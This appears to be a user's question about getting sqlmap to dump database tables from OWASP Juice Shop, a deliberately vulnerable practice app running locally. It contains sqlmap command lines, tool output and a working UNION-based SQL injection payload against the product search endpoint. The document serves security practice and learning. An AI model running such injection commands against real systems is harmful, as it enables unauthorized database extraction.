I cannot seem to get sqlmap to successfully exploit and retrieve schema information from OWASP's deliberately vulnerable Juice Shop web application.
I've tried to be very specific in my sqlmap command line options to help it along, but it still refuses to cooperate. This is the command that appeared to get me closest:
python .\sqlmap.py -u 'http://localhost:3000/rest/product/search?q=' -p 'q' --level=3 --risk=3 --dbms="sqlite" --dump-all --technique U --union-cols 8
(I did try --prefix and --suffix .)
This generates:
___
__H__
___ ___[']_____ ___ ___ {1.3.4.4#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:04:29 /2019-04-11/
[15:04:29] [INFO] setting file for logging HTTP traffic
[15:04:29] [WARNING] provided value for parameter 'q' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:04:29] [INFO] testing connection to the target URL
[15:04:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:04:29] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[15:04:29] [INFO] testing for SQL injection on GET parameter 'q'
[15:04:29] [INFO] testing 'Generic UNION query (NULL) - 8 to 8 columns (custom)'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:04:41] [INFO] GET parameter 'q' is 'Generic UNION query (NULL) - 8 to 8 columns (custom)' injectable
[15:04:41] [INFO] checking if the injection point on GET parameter 'q' is a false positive
[15:04:42] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'q' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
---
Parameter: q (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns (custom)
Payload: q=')) UNION ALL SELECT NULL,NULL,NULL,'qxxzq'||'LlkaVrDwPonWdigiXmqckYvJPXMWbHsyWktSKLUe'||'qzxbq',NULL,NULL,NULL,NULL-- BdIT
---
[15:04:46] [INFO] testing SQLite
[15:04:46] [INFO] confirming SQLite
[15:04:46] [INFO] actively fingerprinting SQLite
[15:04:46] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[15:04:46] [INFO] sqlmap will dump entries of all tables from all databases now
[15:04:46] [INFO] fetching tables for database: 'SQLite_masterdb'
[15:04:46] [WARNING] the SQL query provided does not return any output
[15:04:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:04:46] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
[15:04:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 264 times
[15:04:51] [INFO] fetched data logged to text files under 'C:\Users\james.keeler\AppData\Local\sqlmap\output\localhost'
[*] ending @ 15:04:51 /2019-04-11/
You can see it recognizes the 'q' parameter as vulnerable but it can't properly inject a payload that doesn't create a 500 error.
This is the vulnerable query that comes back on the error pages:
SELECT * FROM Products WHERE ((name LIKE '%[INJECTION POINT]%' OR description LIKE '%[INJECTION POINT]%') AND deletedAt IS NULL) ORDER BY name
If the query doesn't crash, valid responses look like this:
{"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"image":"apple_juice.jpg","createdAt":"2019-04-09 20:42:47.955 +00:00","updatedAt":"2019-04-09 20:42:47.955 +00:00","deletedAt":null},{"id":24,"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be <a href=\"/#recycle\">sent back to us</a> for recycling.","price":0.89,"image":"apple_pressings.jpg","createdAt":"2019-04-09 20:42:47.956 +00:00","updatedAt":"2019-04-09 20:42:47.956 +00:00","deletedAt":null}]}
I also tried debugging sqlmap with PyCharm so I could walk through the logic. I spent several hours on this, but there are so many requests and caching that I found myself hopelessly lost. I did find that when the union techniques were executed they produced invalid SQL. The payload seemed to be repeated multiple times. I couldn't tell if it was sqlmap or the fact that the query has two injection points.
And finally, I tried configuring a custom payload in the xml/paylods/union_query.xml configuration file. I couldn't find any really good documentation or examples other than what was already in the file. Using the --test-filter option (I think) I was able to specify my custom payload, but I still received this warning: [14:39:29] [WARNING] the SQL query provided does not return any output.
What am I doing wrong?
Reproduction Steps
There are several ways to get Juice Shop running, but the easiest is with Docker. You can recreate my issue with the following commands:
docker pull bkimminich/juice-shopdocker run --rm -p 3000:3000 bkimminich/juice-shopsqlmap -u 'http://localhost:3000/rest/product/search?q=' -p 'q' --level=3 --risk=3 --dbms="sqlite" --dump-all --technique U --union-cols 8
